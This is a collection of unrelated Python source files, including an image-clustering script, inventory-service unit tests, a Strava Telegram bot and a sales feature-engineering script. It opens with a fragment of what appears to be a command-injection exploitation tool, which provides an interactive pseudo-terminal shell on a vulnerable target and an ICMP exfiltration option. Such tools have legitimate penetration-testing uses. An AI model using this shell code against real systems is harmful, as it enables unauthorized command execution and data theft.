              print "  (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
              print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20"," ",payload) + colors.RESET

            # Check for any enumeration options.
            cb_enumeration.do_check(separator,TAG,prefix,suffix,whitespace,http_request_method,url,vuln_parameter)

            # Pseudo-Terminal shell
            gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
            if gotshell in settings.CHOISE_YES:
              print ""
              print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
              while True:
                try:
                  cmd = raw_input("Shell > ")
                  if cmd == "q":
                    sys.exit(0)

                  else:
                    # The main command injection exploitation.
                    response = cb_injector.injection(separator,TAG,cmd,prefix,suffix,whitespace,http_request_method,url,vuln_parameter)

                    # if need page reload
                    if menu.options.url_reload:
                      time.sleep(delay)
                      response = urllib.urlopen(url)

                    # Command execution results.
                    shell = cb_injector.injection_results(response,TAG)

                    if shell:
                      shell = "".join(str(p) for p in shell)
                      print "\n" + colors.GREEN + colors.BOLD + shell + colors.RESET + "\n"

                except KeyboardInterrupt:
                  print ""
                  sys.exit(0)

            else:
              # User declined the shell: keep scanning other combinations.
              print "(*) Continue testing the "+ technique +"... "
              pass

  if no_result == True:
    if menu.options.verbose == False:
      print "[" + colors.RED + " FAILED "+colors.RESET+"]"
    else:
      print ""
    return False

  else :
    print ""
def exploitation(url,delay,filename,http_request_method):
  """Dispatch: run the ICMP exfiltration handler when --ip-icmp-data was
  supplied, otherwise fall back to the classic results-based handler."""
  if not menu.options.ip_icmp_data:
    cb_injection_handler(url,delay,filename,http_request_method)
    return
  icmp_exfiltration_handler(url,http_request_method)
|
993,537 | b12dd5288ec5646d53f90aa519f58a5b6cd6844e | from image_processing.clustering import Cluster
import argparse
import glob
import cv2
import numpy as np
import csv
import pickle, pprint
# Construct the argument parser and parse the arguments.
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--features_db", required = True,
	help = "Path to the directory that stores images features")
ap.add_argument("-c", "--clusters", required = True,
	help = "Path to where the clusters will be stored")
args = vars(ap.parse_args())

print('Getting images features...')
data = []
with open(args["features_db"]) as f:
    reader = csv.reader(f)
    for row in reader:
        # First CSV column is the image identifier; the rest are descriptor values.
        features = np.asarray([float(x) for x in row[1:]])
        # Each descriptor is a vector of length 128 (the original comment said 32,
        # which would match ORB, but the reshape uses 128 — e.g. SIFT descriptors).
        features = features.reshape(len(features) // 128, 128)
        data.extend(features)
# Note: the explicit f.close() was removed — the with-block already closes the file.

# Perform clustering on the stacked descriptor vectors.
print('Clustering...')
data = np.asarray(data)
# numCluster = len(data) // 100
numCluster = 150
clt = Cluster(numCluster)
cluster = clt.cluster(data)

# Persist the fitted clustering model.
print('Saving clusters...')
with open(args["clusters"], "wb") as fout:
    pickle.dump(cluster, fout, pickle.HIGHEST_PROTOCOL)
|
993,538 | ec33d43090b9cc6dd9507251c3a09bf6ec4e4ead | import requests
import responses
import string
import unittest
import mock
from drift import app, inventory_service_interface
from drift.exceptions import InventoryServiceError, SystemNotReturned
from . import fixtures
class InventoryServiceTests(unittest.TestCase):
def setUp(self):
test_connexion_app = app.create_app()
test_flask_app = test_connexion_app.app
self.client = test_flask_app.test_client()
self.mock_logger = mock.Mock()
def _create_response_for_systems(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body=fixtures.FETCH_SYSTEMS_INV_SVC, status=requests.codes.ok,
content_type='application/json')
def _create_response_for_system_profiles(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s/system_profile?per_page=20"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body=fixtures.FETCH_SYSTEM_PROFILES_INV_SVC, status=requests.codes.ok,
content_type='application/json')
def _create_500_response_for_systems(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body="I am error", status=requests.codes.INTERNAL_SERVER_ERROR,
content_type='application/json')
def _create_500_response_for_system_profiles(self, service_hostname, system_uuids):
url_template = "http://%s/api/inventory/v1/hosts/%s/system_profile?per_page=20"
responses.add(responses.GET, url_template % (service_hostname, system_uuids),
body="I am error", status=requests.codes.INTERNAL_SERVER_ERROR,
content_type='application/json')
@responses.activate
def test_fetch_systems_with_profiles(self):
systems_to_fetch = ['243926fa-262f-11e9-a632-c85b761454fa',
'264fb5b2-262f-11e9-9b12-c85b761454fa']
self._create_response_for_systems('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
self._create_response_for_system_profiles('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
systems = inventory_service_interface.fetch_systems_with_profiles(systems_to_fetch,
"my-auth-key",
self.mock_logger)
found_system_ids = {system['id'] for system in systems}
self.assertSetEqual(found_system_ids, set(systems_to_fetch))
@responses.activate
def test_fetch_systems_missing_system(self):
systems_to_fetch = ['243926fa-262f-11e9-a632-c85b761454fa',
'264fb5b2-262f-11e9-9b12-c85b761454fa',
'269a3da8-262f-11e9-8ee5-c85b761454fa']
self._create_response_for_systems('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
self._create_response_for_system_profiles('inventory_svc_url_is_not_set',
','.join(systems_to_fetch))
with self.assertRaises(SystemNotReturned) as cm:
inventory_service_interface.fetch_systems_with_profiles(systems_to_fetch,
"my-auth-key",
self.mock_logger)
self.assertEqual(cm.exception.message,
"System(s) 269a3da8-262f-11e9-8ee5-c85b761454fa not available to display")
@responses.activate
def test_fetch_systems_backend_service_error(self):
    """Backend HTTP 500 responses surface as InventoryServiceError."""
    systems_to_fetch = ['243926fa-262f-11e9-a632-c85b761454fa',
                        '264fb5b2-262f-11e9-9b12-c85b761454fa',
                        '269a3da8-262f-11e9-8ee5-c85b761454fa']
    self._create_500_response_for_systems('inventory_svc_url_is_not_set',
                                          ','.join(systems_to_fetch))
    self._create_500_response_for_system_profiles('inventory_svc_url_is_not_set',
                                                  ','.join(systems_to_fetch))
    with self.assertRaises(InventoryServiceError) as cm:
        inventory_service_interface.fetch_systems_with_profiles(systems_to_fetch,
                                                                "my-auth-key",
                                                                self.mock_logger)
    self.assertEqual(cm.exception.message,
                     "Error received from backend service")
def test_fetch_too_many_systems(self):
    """Requests above the 20-system limit are rejected up-front."""
    too_many_ids = list(string.ascii_lowercase)  # 26 ids, over the limit
    with self.assertRaises(SystemNotReturned) as cm:
        inventory_service_interface.fetch_systems_with_profiles(too_many_ids, "my-auth-key",
                                                                self.mock_logger)
    self.assertEqual(cm.exception.message,
                     "Too many systems requested, limit is 20")
|
993,539 | b5bffcc2c828b26be96c1e0ec7d28596365cfc9b | #-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: andr.stankevich
#
# Created: 28.11.2018
# Copyright: (c) andr.stankevich 2018
# Licence: <your licence>
#------------------------------------------------------------------------
import telebot
import json
import time
import requests
import urllib
from flask import Flask, request, redirect, session, url_for
from flask_sqlalchemy import SQLAlchemy
from requests_oauthlib import OAuth2Session
from telebot import types
from datetime import datetime
import config
import urllib.request
import urllib.parse
from sqlalchemy import exc
from telegraph import Telegraph
from jinja2 import Environment, PackageLoader, select_autoescape
#### Program configuration starts here (translated from Russian)
# TODO: move these settings into a separate config module
TOKEN=config.TOKEN
bot = telebot.TeleBot(config.TOKEN, threaded=False)
client_id = config.client_id
client_secret = config.client_secret
# OAuth scopes requested from Strava.
scope = 'activity:read_all,activity:write,profile:read_all,profile:write'
authorization_base_url = 'https://www.strava.com/oauth/authorize'
token_url = 'https://www.strava.com/oauth/token'
refresh_url = 'https://www.strava.com/oauth/token'
response_typ = 'code'
redirect_uri = config.redirect_uri  # should match the Site URL registered with Strava
start_uri = config.start_uri
webhook_uri=config.webhook_uri
# Strava activity types, top-level menu options, and the activity fields kept
# for display.
# Fixes: "Rowing, Run" and "Sail, Skateboard" were each one string, so the
# Run / Sail / Skateboard activity types could never match a user's choice,
# and " max_watts" carried a stray leading space so that field was always
# filtered out by preSort().
tranings_list = ["AlpineSki", "BackcountrySki", "Canoeing", "Crossfit", "EBikeRide", "Elliptical", "Golf",
                 "Handcycle", "Hike", "IceSkate", "InlineSkate", "Kayaking", "Kitesurf", "NordicSki",
                 "Ride", "RockClimbing", "RollerSki", "Rowing", "Run", "Sail", "Skateboard", "Snowboard",
                 "Snowshoe", "Soccer", "StairStepper", "StandUpPaddling", "Surfing", "Swim", "Velomobile",
                 "VirtualRide", "VirtualRun", "Walk", "WeightTraining", "Wheelchair", "Windsurf", "Workout", "Yoga"]
Options_list = ["Display_last_10_trainigs", "Display last 10 trainigs by activity type", " My year stat", "my all time stat"]
keys_list_ride = ['type', 'name', 'average_heartrate', 'average_speed', "average_watts", "max_heartrate", "max_watts", "id"]
# Jinja environment used to render the activity table (Template/1.html).
env = Environment( loader=PackageLoader('mysite', 'Template'), autoescape=select_autoescape(['html', 'xml']))
template = env.get_template('1.html')
###
app = Flask(__name__)
app.secret_key = config.key
app.config["SQLALCHEMY_DATABASE_URI"] = config.SQLALCHEMY_DATABASE_URI
app.config["SQLALCHEMY_POOL_RECYCLE"] = 200
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db = SQLAlchemy(app)
# Per-chat in-memory cache of already-fetched activity pages (see list_get).
temp_data_dict={}
# Persist telebot "next step" handlers so multi-step dialogs survive restarts.
bot.enable_save_next_step_handlers(delay=2)
class StravaUser(db.Model):
    """One linked Strava account, keyed by the Telegram chat it talks from.

    Stores the OAuth access/refresh token pair used for Strava API calls.
    """
    id = db.Column(db.Integer, primary_key=True)
    # Strava first name of the athlete.
    username = db.Column(db.String(80), unique=True)
    # Telegram chat id (stored as a string).
    telegram_chat_id = db.Column(db.String(120), unique=True)
    # OAuth access token / refresh token pair.
    token = db.Column(db.String(120), unique=True)
    refresh_token= db.Column(db.String(120), unique=True)
    last_seen= db.Column(db.DateTime, index=True, default=datetime.utcnow)
    def __init__(self, username, telegram_chat_id, token, refresh_token):
        self.username = username
        self.telegram_chat_id =telegram_chat_id
        self.token=token
        self.refresh_token=refresh_token
    def __repr__(self):
        return '<User %r>' % self.username
@app.route('/data/<int:v_int>')
def data(v_int):
    """Render the activity-table template from JSON passed in the `s_data`
    query argument. `v_int` only varies the URL; it is not read here."""
    f=request.args.get("s_data")
    # NOTE(review): str.encode returns a new bytes object — this line has no
    # effect as written; confirm whether it can simply be removed.
    f.encode("utf-8")
    v=json.loads(f)
    g=template.render(data=v)
    return (g)
#### работа с сайтом
@app.route("/")
def bu():
return("<h1> Privet <h1>")
@app.route("/login", methods=["GET","POST"])
def login1():
messagechatid=request.args.get('message.chat.id', None)
# """Step 1: User Authorization. Redirect the user/resource owner to the OAuth provider (i.e. Strava) using an URL with a few key OAuth parameters."""
strava = OAuth2Session(client_id,scope=scope,redirect_uri=redirect_uri)
authorization_url, state =strava.authorization_url(authorization_base_url)
session['message.chat.id']=messagechatid
session['oauth_state'] = state
return redirect(authorization_url)
@app.route("/callback", methods=["GET","POST"])
def callback():
#print (request.args())
print(session)
message_chat_id=session["message.chat.id"]
stravalogin = OAuth2Session(client_id)
token = stravalogin.fetch_token(token_url, client_secret=client_secret,
authorization_response=request.url)
print(session)
from jinja92 import Template
print(session)
session['oauth_token'] = token
acces_test = User_filter_by_chat_id(message_chat_id, token["athlete"].get("firstname", "Кто-то без имени"), token['access_token'], token['refresh_token'])
t= Template("Hello {{ name }}!")
time.sleep(20)
if acces_test.Is_Exsist() == False:
if acces_test.acces_test():
acces_test.new_profile()
else:
bot.send_message(message_chat_id, "Why you see this mmesse???? WHY???????? pls Open activity read all ")
acces_test.login()
else: pass
return (t.render(name= session['oauth_token']["athlete"].get("firstname", "мы еще не знакомы")))
# @app.route("/refresh_token", methods=["GET","POST"])
# def refresh_token():
# messagechatid=request.args.get('message.chat.id', None)
@app.route("/webhook" + TOKEN, methods=['POST'])
def getMessage():
#обраотчик веб хука
if request.headers.get('content-type') == 'application/json':
json_string = request.get_data().decode('utf-8')
update = telebot.types.Update.de_json(json_string)
time.sleep(2)
bot.process_new_updates([update])
return 'bubju'
@app.route("/webhook", methods=["GET","POST"])
def webhook():
###тавим веб хук для бота надо вызывать это сайт из браузера
bot.remove_webhook()
bot.set_webhook(url=webhook_uri + TOKEN)
return ("!", 200)
def trainigslist_get():
    """Send an inline keyboard with the four main activity types.

    Fix: the callback payload variables (`to_sent`…`to_sent3`) existed only in
    commented-out lines, so this function raised NameError on every call. The
    payloads are restored without the user token the drafts referenced.
    TODO(review): re-append the per-user token once its source here is decided.
    """
    keyboard1 = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
    to_sent = "lasttrainigN:Ride"
    to_sent1 = "lasttrainigN:Run"
    to_sent2 = "lasttrainigN:Swim"
    to_sent3 = "lasttrainigN:VirtualRide"
    button1 = types.InlineKeyboardButton(text= "Bike", callback_data=to_sent )
    button2 = types.InlineKeyboardButton(text= "Run", callback_data=to_sent1 )
    button3 = types.InlineKeyboardButton(text= "Swim", callback_data=to_sent2 )
    button4 = types.InlineKeyboardButton(text= "VirtualRide", callback_data=to_sent3 )
    keyboard1.add(button1, button2 , button3,button4)
    bot.send_message(session["message.chat.id"], "chouse to see last trainigs", reply_markup=keyboard1)
def sent_filtered_data(num, chat_id, query_string=1):
    """Send a one-activity summary (name, type, max HR, avg watts) to the chat.

    `query_string` is accepted for caller compatibility but unused.
    """
    summary = "Название тренировки {} \n тип тренироки {} \n максимальный пульс {} \n средняя мощность {}".format(
        num["name"],
        num["type"],
        num.get("max_heartrate", "нэт его"),
        num.get("average_watts", "в нет"))
    bot.send_message(chat_id, summary)
class User_filter_by_chat_id():
    """Lookup/CRUD wrapper around the StravaUser row for one Telegram chat.

    Two construction modes:
    - chat_id + name/token/refresh_token: registration path, credentials fresh
      from the OAuth callback;
    - chat_id only: lookup path, credentials loaded from the DB when the row
      exists (token/refresh_token/name stay unset for unknown chats).

    Fix: refresh_data() assigned `datetime.utcnow` (the function object) to
    last_seen instead of calling it.
    """

    def __init__(self, chat_id, name= None, token = None, refresh_token = None):
        self.chat_id=chat_id
        if token and refresh_token and name:
            self.token = token
            self.refresh_token=refresh_token
            self.name=name
            self.user_to_find = StravaUser.query.filter_by(telegram_chat_id=self.chat_id).first()
        else:
            try:
                self.user_to_find = StravaUser.query.filter_by(telegram_chat_id=self.chat_id).first()
                if self.user_to_find:
                    self.token = self.user_to_find.token
                    self.refresh_token = self.user_to_find.refresh_token
                    self.name = self.user_to_find.username
            except exc.SQLAlchemyError:
                bot.send_message(self.chat_id, "SQL data base failed FML")

    def Is_Exsist(self):
        """Return True when a StravaUser row exists for this chat."""
        return bool(self.user_to_find)

    def refresh_data(self):
        """Persist the in-memory token pair and bump last_seen."""
        print('refreshing db')
        self.user_to_find.token = self.token
        self.user_to_find.refresh_token = self.refresh_token
        self.user_to_find.last_seen = datetime.utcnow()  # fixed: was the bare function
        db.session.commit()

    def del_user(self):
        """Delete this user's row from the DB."""
        db.session.delete(self.user_to_find)
        db.session.commit()

    def manual_refresh(self):
        """Exchange the stored refresh token for a new access/refresh pair."""
        extra = {
            'client_id': client_id,
            'client_secret': client_secret,
        }
        strava = OAuth2Session (client_id, )
        v = strava.refresh_token(refresh_url, refresh_token=self.user_to_find.refresh_token, **extra)
        db.session.merge(self.user_to_find)
        self.user_to_find.token = v.get("access_token", "no_data")
        self.user_to_find.refresh_token = v["refresh_token"]
        db.session.commit()
        print(self.refresh_token)

    def acces_test(self, page=1 ,per_page=1):
        """Probe the Strava activities endpoint; True on HTTP 200, None otherwise."""
        try:
            url="https://www.strava.com/api/v3/athlete/activities"
            param={"per_page":f"{per_page}","page":f"{page}"}
            headers = {'Authorization': "Bearer "+self.token}
            initial_response=requests.get(url, params=param, headers = headers, allow_redirects=False)
            data2=initial_response.json()
            print("geting acces")
            if initial_response.status_code == requests.codes.ok:
                print(data2)
                return(True)
            if initial_response.headers.get("status") == "401 Unauthorized":
                return (None)
        except requests.exceptions.ConnectionError as e:
            print( "Error: on url {}".format(e))

    def login(self):
        """Send the Strava OAuth login button to this chat."""
        keyboard = types.InlineKeyboardMarkup()
        params = urllib.parse.urlencode({'message.chat.id': self.chat_id})
        uri = start_uri+params
        url_button = types.InlineKeyboardButton(text="залогиниться в стравe", url=uri)
        keyboard.add(url_button)
        bot.send_message(self.chat_id, "Привет! Нажми на кнопку и перейди в eбучую страву.", reply_markup=keyboard)
        return (True)

    def new_profile(self):
        """Insert a new StravaUser row from the in-memory credentials."""
        new_user=StravaUser(self.name, self.chat_id, self.token, self.refresh_token)
        db.session.add(new_user)
        try:
            db.session.commit()
        except exc.SQLAlchemyError:
            bot.send_message(self.chat_id, "SQL data base failed FML")
@bot.message_handler(commands=['start'])
def start(message):
    """/start — greet, then show the menu for known users or begin OAuth login.

    Fix: `user.username()` raised AttributeError — the accessor exposes the
    athlete name as the `name` attribute, not a `username()` method.
    """
    bot.send_message(message.chat.id, 'Hello,this is strava bot one day your could analize strava in telegram. now days run in test mode ')
    user=User_filter_by_chat_id(message.chat.id)
    if user.Is_Exsist():
        bot.send_message(message.chat.id, 'Hello old friend {}'.format(user.name), reply_markup=types.ReplyKeyboardRemove())
        firstlist(message.chat.id)
    else:
        user.login()
@bot.message_handler(commands=['stop'])
def del_use(message):
    """/stop — delete the user's row, or prompt to register first.

    Fix: `user_del.username()` raised AttributeError; use the `name` attribute.
    """
    user_del=User_filter_by_chat_id(message.chat.id)
    if user_del.Is_Exsist():
        bot.send_message(message.chat.id, 'By old friend {} '.format(user_del.name), reply_markup=types.ReplyKeyboardRemove())
        user_del.del_user()
    else:
        bot.send_message(message.chat.id, "If dog doen't sheet it will exsplloed\n Create new account first",reply_markup=types.ReplyKeyboardRemove())
@bot.message_handler(commands=['revoke_token'])
def revoke_token(message):
    """/revoke_token — force-refresh the stored OAuth token pair.

    Fix: `user.username()` raised AttributeError; use the `name` attribute.
    """
    bot.send_message(message.chat.id, 'problems? ')
    user=User_filter_by_chat_id(message.chat.id)
    print(user)
    if user.Is_Exsist():
        bot.send_message(message.chat.id, 'Hello old friend {} revoking your token'.format(user.name), reply_markup=types.ReplyKeyboardRemove())
        user.manual_refresh()
    else:
        user.login()
### тут уже обработчик стравы api тож в отдельный класс
def getlasttrainigs(chat_id, page=1 ,days_to_search=10, activity=True, efforts=True):
    """Fetch one 200-activity page from the Strava API for this chat's user.

    On a non-200 response the stored token is refreshed once and the request
    retried. Returns the parsed JSON list, or None on connection errors.
    NOTE(review): days_to_search / activity / efforts are currently unused.
    """
    try:
        print("gettonglast_traings")
        new_user=User_filter_by_chat_id(chat_id)
        token= new_user.token
        print(token)
        url="https://www.strava.com/api/v3/athlete/activities"
        param={"per_page":"200","page":f"{page}"}
        headers = {'Authorization': "Bearer "+token}
        initial_response=requests.get(url, params=param, headers = headers, allow_redirects=False)
        data2=initial_response.json()
        bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
        if initial_response.status_code == requests.codes.ok:
            ##print(data2)
            return (data2)
        else:
            # Token likely expired: refresh it and retry once.
            try:
                new_user.manual_refresh()
                bot.send_message(chat_id, "updating token")
                token1 = new_user.token
                headers1 = {'Authorization': "Bearer "+token1}
                print(token)
                initial_response=requests.get(url, params=param, headers = headers1, allow_redirects=False)
                data2=initial_response.json()
                bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
                return(data2)
            except requests.exceptions.ConnectionError as e:
                bot.send_message(chat_id, "OOOOPPPS some errors with token pls log_out and login, {}".format(e))
                return (None)
    except requests.exceptions.ConnectionError as e:
        #print(r.url)
        bot.send_message(chat_id, "OOOOPPPS some errors with token pls log_out and login, {}".format(e))
def sent_last_trainigs(message,step=0 ,activiteis=50 ):
    """Step handler: publish a telegra.ph page with the chosen activity type's
    recent trainings, then re-register itself so "more data" pages through.

    NOTE(review): `tupe` is only bound when message.text is a known activity
    type; any other text ("back"/"/Start" re-show the menu but still fall
    through) hits a NameError at the print/list_get below — confirm flow.
    """
    # Translated: only Ride-type data was originally intended, showing pulse and power.
    chat_id=message.chat.id
    activiteis=activiteis
    print(message.text)
    if message.text in tranings_list:
        tupe = message.text
    if message.text == "back":
        firstlist(chat_id)
    if message.text == "/Start":
        firstlist(chat_id)
    bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
    print("tupe fromsecon click{}".format(tupe))
    listdata, step =list_get(chat_id, step,activiteis=activiteis, filtrer_act = tupe, filter_off= False)
    list_to_sent=sent_url_post(preSort(listdata))
    print(list_to_sent)
    bot.send_message(message.chat.id, "{}".format(list_to_sent))
    #dict_new= json.dumps(preSort(listdata))
    #sent_url=url_for('data',v_int =1213214,s_data = dict_new)
    #bot.send_message(message.chat.id, "http://astanly.pythonanywhere.com{}".format(sent_url))
    keyboard1 = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
    [keyboard1.add(i) for i in ["back", f"{message.text}"]]
    msg=bot.send_message(message.chat.id, "What shoud i do next?\n To see more data press {}{}".format(message.text, step), reply_markup=keyboard1)
    # step == -1 marks "no more pages" (set by list_get); only advance otherwise.
    if step >= 0:
        step+=1
    bot.register_next_step_handler(msg, sent_last_trainigs, step=step,activiteis=activiteis )
def list_get(chat_id,step,filtrer_act,filter_off, activiteis=50):
    """Collect `activiteis` activities of type `filtrer_act` for page `step`.

    Pages through the Strava API (200 activities per request), caching fetched
    data per chat in the module-level temp_data_dict so later steps resume
    where the previous one stopped. Returns (activities, step); step == -1
    signals that no further pages are available, -2 is a guard for overflow.
    When filter_off is True the type filter is bypassed.
    """
    chat_id=chat_id
    page=0
    v=[]
    # Resume from the cached state of the previous step, if any.
    if all([chat_id in temp_data_dict, step>0]):
        train_list=temp_data_dict[chat_id]
        print(train_list)
        page=train_list[step-1]["step"]["page"]
        v=train_list[step-1]["step"]["data"]
    if step ==0:
        d=[]
        temp_data_dict[chat_id]=d
        bot.send_message(chat_id, "filtering activities")
    # Keep fetching pages until enough matching activities are accumulated,
    # capped at 20 extra API pages per step.
    while len(v)<(activiteis+activiteis*step):
        page+=1
        if page < (20+20*step):
            listdata=getlasttrainigs(chat_id,page)
            bot.send_chat_action(chat_id, 'typing') # show the bot "typing" (max. 5 secs)
            i= [num for num in listdata if any([num["type"]== filtrer_act, filter_off==True])]
            v.extend(i)
        else:
            bot.send_message(chat_id, "In your 400 activivteies \n only {} found ".format(len(v)))
            step=-1
            break
    # Cache the accumulated data for the next step.
    if len(v)>0:
        temp_dict={"step":{"data":v, "length":len(v), "page":page}}
        temp_list=temp_data_dict[chat_id]
        temp_list.append(temp_dict)
        temp_data_dict[chat_id]=temp_list
    if step == 0:
        print( "step{}".format(step))
        try:
            del v[activiteis:len(v)]
        except:
            pass
    if step == -2:
        bot.send_message(chat_id, "we are going to reach singularity!??")
    if step > 0:
        # Slice out only this step's window of activities.
        try:
            del v[(activiteis*step+activiteis):len(v)]
            del v[0:activiteis*step]
            if len(v)<activiteis:
                step=-1
        except:
            pass
    return (v,step)
def preSort(m):
    """Reduce each activity dict to the whitelisted fields in keys_list_ride."""
    slimmed = []
    for activity in m:
        kept = {field: value for field, value in activity.items() if field in keys_list_ride}
        print(kept)
        slimmed.append(kept)
    print(slimmed)
    return slimmed
def sent_url_post(data_to_sent):
    """Render the activity table and publish it as a telegra.ph page.

    Returns the public page URL.
    NOTE(review): a fresh anonymous Telegraph account is created per call —
    confirm whether one shared account should be reused instead.
    """
    m=template.render(data=data_to_sent)
    print (m)
    telegraph = Telegraph()
    telegraph.create_account(short_name="starava_bot")
    response = telegraph.create_page('ioiioio data',html_content=m)
    print(response)
    return('https://telegra.ph/{}'.format(response['path']))
def trainigslist(message):
    """Route the user's choice from the main options keyboard.

    Fix: the "Display_last_10_trainigs" branch called list_get() without the
    required `step` argument, with a misspelled keyword (filter_act instead of
    filtrer_act) and ignored that list_get returns a (data, step) tuple — it
    raised TypeError before reaching the data.
    """
    if message.text == "Display last 10 trainigs by activity type":
        keyboard1 = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
        for i in tranings_list:
            keyboard1.add(i)
        msg1=bot.send_message(message.chat.id, "choose activite to getlist to see last trainigs", reply_markup=keyboard1)
        bot.register_next_step_handler(msg1, sent_last_trainigs,step=0)
    if message.text == "Display_last_10_trainigs":
        listdata, _step = list_get(message.chat.id, step=0, filtrer_act="blabla", filter_off=True, activiteis=10)
        dict_new= json.dumps(preSort(listdata))
        sent_url=url_for('data',v_int =1213214,s_data = dict_new)
        bot.send_message(message.chat.id, "http://astanly.pythonanywhere.com{}".format(sent_url))
        firstlist(message.chat.id, msg_1 ="what_next")
    if message.text == "back":
        firstlist(message.chat.id, msg_1 ="what_next")
def firstlist(chat_id, msg_1="chouse to see last trainigs"):
    """Show the top-level options keyboard and route the reply to trainigslist."""
    markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)
    for option in Options_list:
        markup.add(option)
    markup.add("back")
    prompt = bot.send_message(chat_id, msg_1, reply_markup=markup)
    bot.register_next_step_handler(prompt, trainigslist)
if __name__ == '__main__':
    # Local development run; in production the WSGI server imports `app`.
    app.run(threaded=False)
|
993,540 | 2b411daa6ec21ffec907545c98c5b27d9bb268d2 | """
Code documentation for Microservice
.. include:: ./README.md
"""
from main import app
if __name__ == '__main__':
    # Dev entry point; HOST/PORT come from the Flask app's config.
    app.run(host=app.config['HOST'], port=app.config['PORT'])
|
993,541 | dbee7acdd8d7d4f46763565dd8d431a057f82258 | class Warehouse:
purpose = 'storage'
region = 'west'
# Both instances start with the shared class attributes.
first = Warehouse()
print(first.purpose, first.region)

second = Warehouse()
second.region = 'east'  # instance attribute now shadows the class attribute
print(second.purpose, second.region)
|
993,542 | 3d329341d0bffff80c3a5bbc0acbe2b803fa6468 | # -*- coding: utf-8 -*-
# @Time : 2020/6/18 10:06
# @Author : skydm
# @Email : wzwei1636@163.com
# @File : high_train.py
# @Software: PyCharm
import os
import pickle
import numpy as np
import pandas as pd
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
import tensorflow as tf
desired_width = 320
pd.set_option('display.width', desired_width)  # console display width
pd.set_option('display.max_columns', None)  # show all columns in the console
os.environ["CUDA_VISIBLE_DEVICES"] = "3"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'  # suppress TensorFlow C++ log noise
def read_from_pickle(file):
    """Load and return the object pickled in `file`.

    Fix: the file handle is now closed deterministically via a context
    manager (the original opened the file and never closed it).
    """
    with open(file, "rb") as f:
        return pickle.load(f)
def areaid_dummy(df):
    """One-hot encode the `areaid` column (translated: area id to dummies).

    Known area ids are remapped to their ordinal position, then expanded into
    `areaid_<n>` indicator columns joined onto the frame; the remapped ordinal
    `areaid` column itself is kept.
    """
    known_areas = [1, 7, 84, 5, 12, 6, 46, 51, 16]
    ordinal_of = {area: pos for pos, area in enumerate(known_areas)}
    df["areaid"] = df["areaid"].map(ordinal_of)
    indicators = pd.get_dummies(df['areaid'], prefix='areaid')
    # Unknown ids map to NaN, which turns dummy labels into floats
    # ("areaid_1.0"); strip the ".0" so column names stay consistent.
    indicators = indicators.rename(lambda col: col.replace('.0', ''), axis='columns')
    return df.join(indicators)
def cate_dummy(df):
    """One-hot encode the `categoryid` column (translated: category to dummies)."""
    categories = ["Antiques", "Jewellery&Watches", "Art", "SportingGoods", "CarsMotorcycles&Vehicles",
                  "Holidays&Travel", "PetSupplies", "MobilePhones&Communication", "EverythingElse",
                  "BusinessOffice&Industrial",
                  "VehicleParts&Accessories", "VideoGames&Consoles", "Collectables", "Crafts", "MusicalInstruments",
                  "PotteryPorcelain&Glass", "Garden&Patio", "PackageMaterial", "Health&Beauty", "SportsMemorabilia",
                  "Computers/Tablets&Networking", "Sound&Vision", "Toys&Games", "ClothesShoes&Accessories", "EventsTickets",
                  "ConsumptiveMaterial", "HomeFurniture&DIY", "Coins", "Cameras&Photography", "Stamps",
                  "eBayMotors", "Wholesale&JobLots", "Baby", "Dolls&Bears", "Music", "DVDsFilms&TV", "BooksComics&Magazines"]
    code_of = {label: idx for idx, label in enumerate(categories)}
    df["categoryid"] = df["categoryid"].map(code_of)
    indicators = pd.get_dummies(df['categoryid'], prefix='categoryid')
    # NaN-mapped rows force float column labels ("categoryid_3.0"); drop the ".0".
    indicators = indicators.rename(lambda col: col.replace('.0', ''), axis='columns')
    return df.join(indicators)
def get_nonzero_week(x):
    """Return the index of the oldest week (52 = oldest) with nonzero sales.

    Translated from the original Chinese docstring: finds the position of the
    first nonzero week in the past year; 0 when every week is zero.
    """
    for idx in range(52, 0, -1):
        if x['last_{}week'.format(idx)] > 0:
            return idx
    return 0
def get_nonzero_month(x):
    """Return the index of the oldest month (12 = oldest) with nonzero sales.

    Translated from the original Chinese docstring: finds the position of the
    first nonzero month in the past year; 0 when every month is zero.
    """
    for idx in range(12, 0, -1):
        if x['last_{}month'.format(idx)] > 0:
            return idx
    return 0
def get_mean_week(x):
    """Mean weekly sales over the first num_week valid weeks (translated).

    Returns -99 when num_week is 0 (the division is impossible).
    """
    count = int(x["num_week"])
    labels = ['last_{}week'.format(i) for i in range(1, 53)][:count]
    total = 0
    for label in labels:
        total += x[label]
    try:
        return total / count
    except Exception:
        return -99
def get_mean_month(x):
    """Mean monthly sales over the first num_month valid months (translated).

    Returns -999 when num_month is 0 (the division is impossible).
    """
    count = int(x["num_month"])
    labels = ['last_{}month'.format(i) for i in range(1, 13)][:count]
    total = 0
    for label in labels:
        total += x[label]
    try:
        return total / count
    except Exception:
        return -999
def get_week_var(x):
    """Variance of the first num_week valid weekly values (translated)."""
